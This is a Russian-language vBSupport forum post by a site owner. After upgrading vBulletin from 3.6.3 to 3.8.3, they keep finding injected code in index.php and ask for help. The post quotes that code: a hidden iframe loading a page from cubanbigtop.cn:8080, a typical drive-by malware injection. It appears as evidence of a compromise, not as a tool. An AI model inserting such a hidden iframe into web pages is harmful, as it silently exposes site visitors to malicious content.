VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Недавно обновил стоящий у меня форум с версии 3.6.3 на 3.8.3 и сразу столкнулся со следующей проблемой. Во время загрузки форума появляется следующая ошибка:
Parse error: syntax error, unexpected '<' in /usr/home/forum.psifactor.ru/htdocs/index.php on line 577
Номер строки может меняться. Просматривая код index.php я увидел что там непонятно откуда появилось следующее:
// get total members an
<iframe src="http://cubanbigtop.cn:8080/index.php" width=110 height=150 style="visibility: hidden"></iframe>
При залитии index.php из бекапа работа форума восстановилась, но через некоторое время проблема вернулась. Появилась мысль что на хостинге или в компе сидит троян, но проверки показали что всё чисто. Хотелось бы попросить многоуважаемую публику посоветовать мне как можно решить данную проблему. Файл с описываемым кодом я прилагаю. Заранее спасибо за помощь.